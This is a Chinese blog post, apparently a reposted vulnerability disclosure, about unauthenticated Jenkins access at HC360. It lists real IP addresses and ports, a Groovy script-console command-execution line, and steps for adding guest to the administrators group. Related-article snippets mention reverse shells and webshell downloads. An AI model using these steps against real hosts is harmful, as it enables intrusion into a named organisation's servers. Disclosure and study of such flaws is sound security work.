【漏洞学习——未授权访问】慧聪网Jenkins系统未授权访问

最新推荐文章于 2025-10-08 19:05:45 发布
原创 最新推荐文章于 2025-10-08 19:05:45 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文披露了慧聪网多个系统的安全漏洞详情,包括无需密码访问的管理后台、执行命令的能力以及用户权限操作等,突显了企业系统安全的重要性。

漏洞细节

http://58.252.73.136:8007/ (慧聪网询盘宝反馈活动)
http://58.252.73.136:8001/login.aspx (慧聪家电城CRM系统)
http://58.252.73.136:8080(jenkins管理后台,免密码访问)
http://58.252.73.136:8080/script下执行cmd命令

println "ipconfig".execute().text

 

当前权限

查看用户

添加guest到administrators组

解锁guest用户

ping 114.114.114.114

 

参见:https://bugs.shuimugan.com/bug/view?bug_no=171517

 

 

漏洞挖掘】——93、Jenkis未授权访问
Fly_鹏程万里
06-17 326
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
中间件安全-jenkins未授权访问
ce666666的博客
01-23 680
0x01 前言 跟着百度一步步做,也算是认识了​ 0x02 jenkins是什么? Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。 ps:不搞java开发,了解即可。 0x03 漏洞概述 未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。默认端口为8080 0x04 漏洞复现 .
Jenkins未授权访问
weixin_43622525的博客
03-04 2960
Jenkins Jenkins简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,它能把软件开发过程形成工作流。默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。 Jenkins未授权访问 部署Jenkins 1.62版本,将全局授权策略打开,目前新版本的Jenkins已默认需要用户登录,但老版的中默认配置是“任意用...
浅析SpringBoot框架常见未授权访问漏洞
最新发布
lza20001103的博客
10-08 1088
浅析SpringBoot框架常见未授权访问漏洞
未授权访问Jenkins未授权访问漏洞
qq_68163788的博客
05-10 4760
enkins是一个流行的开源持续集成和持续交付工具,用于自动化软件开发过程中的构建、测试和部署。然而,Jenkins存在一个未授权访问漏洞,即攻击者可以通过未经授权的方式访问Jenkins服务器,可能导致敏感信息泄露、恶意代码执行等安全风险。攻击者可以利用这个漏洞来获取对Jenkins服务器的控制权,进而破坏软件构建过程,篡改部署流程或者窃取敏感数据。为了防范此类漏洞,管理员应该及时更新Jenkins软件版本、配置访问控制策略、监控系统日志等措施来加强安全防护。
未授权访问漏洞复现~~~】
m0_59151303的博客
08-05 2514
步骤二:可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测…步骤二:如果存在未授权访问漏洞则直接访问 http://IP:8888会直接跳到web管理界面,不需要输入密码。步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是 admin/admin,在打开的页面输入…步骤二:在打开的URL中…步骤一:使用以下Fofa语法搜索使用Idap服务的产品.…步骤一:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!
Jenkins未授权访问漏洞&命令执行
2401_85014013的博客
05-17 681
进入Script Console之后是一个执行脚本的页面查询当前用户查看IP配置信息。
未授权访问漏洞上(漏洞复现合集)
2301_76631050的博客
08-04 1906
Redis 默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis 以及读取 Redis 的数据。默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
Web漏洞-未授权访问漏洞
Ays.Ie的博客
03-21 4633
该篇记录了web漏洞-未授权访问漏洞的相关知识
Jenkins未授权访问漏洞
qq_50854662的博客
07-08 2134
Jenkins未授权访问漏洞
Jenkins未授权访问+命令执行
m0_49577923的博客
11-11 6110
前言 翻越高山需要迈出一个又一个简单的步伐 一、Jenkins简介 Jenkins是一个独立的、开放源码的自动化服务器,它可以用于自动化与构建、测试、交付或部署软件相关的各种任务。Jenkins是一个CI工具。它可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告 二、Jenkins未授权访问 由于Jenkins默认安装的时候管理员安全意识不高,没有配置密码,所以可以导致任意用户未授权访问到控制页面并且可以对里面的配置进行修改。 正常页面应该是需
从代码层面分析Jenkins未授权访问CVE-2017-1000353
stopys6的博客
09-13 359
/通过上面的ReaderThread.start()方法启动一个线程,ReaderThread为SynchronousCommandTransport类的内部类,在run()方法中,调用ClassicCommandTransport类的read()方法读取输入,read()方法实际是调用Command类的readFrom()方法读取,通过反序列化输入返回一个Command对象。在 run() 方法中,使用一个循环来读取通道中的命令,直到通道被关闭为止。
Jenkins未授权访问漏洞&命令执行
热门推荐
qq_45434762的博客
03-28 1万+
Jenkins未授权访问漏洞环境准备下载安装包,版本1.620.1.1.norachwget http://archives.jenkins-ci.org/redhat/jenkins-1...
Jenkins未授权访问漏洞
weixin_57240513的博客
08-04 887
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
Jenkins未授权访问+命令执行反弹shell(复现)
weixin_54227009的博客
05-22 2766
我们大致了解过皮毛,可以在idea新建项目,经过简单调整格式,本地测试可以运行,浏览器访问发现没有Jenkins没有设置密码,直接就未授权进后台了。1、打内网的时候通过fscan扫到了一台Jenkins服务的机子。3.3在Jenkins的脚本命令行执行反弹shell命令。3.2在菱角社区搞一个反弹shell命令在线生成。2、在系统管理->脚本命令行。3.1在kali上设置监听。
jenkins未授权rce windows主机getshell
m0_46689007的博客
12-11 1631
由于windows环境,反弹shell不方便,试一下远程下载命令,这里面可以用powershell执行下载命令,从上面我们知道的web绝对路径,下载到根目录下。应该是环境原因连接不了webshell,试试windows环境下的反弹shell,因为目标主机可以执行下载命令,我们下载一个nc,访问存在,上传成功。查看”/dashboard/phpinfo.php”,为phpinfo页面,发现为win10系统,win10基本存在Windows Definder。ip先扫一下全端口,发现只有22,80,443。
Jenkins未授权访问漏洞
weixin_71053667的博客
08-04 244
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。步骤二:在打开的URL中..点击 Manage Jenkins。Scritp Console 在执行以下命令.步骤一:使用以下fofa语法进行产品搜索.2.添加认证,设置强密码复杂度及账号锁定。3.禁止把Jenkins直接暴露在公网,》》》漏洞复现《《《》》》漏洞修复《《《
揭秘web漏洞:九大未授权访问案例深度解析
在【99-web漏洞挖掘之未授权访问漏洞1】一文中,作者深入探讨了未授权访问漏洞在多个IT系统中的关键性和常见案例。文章首先聚焦于系统服务的未授权访问,列举了包括Redis、MongoDB、ZooKeeper、Elasticsearch、...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值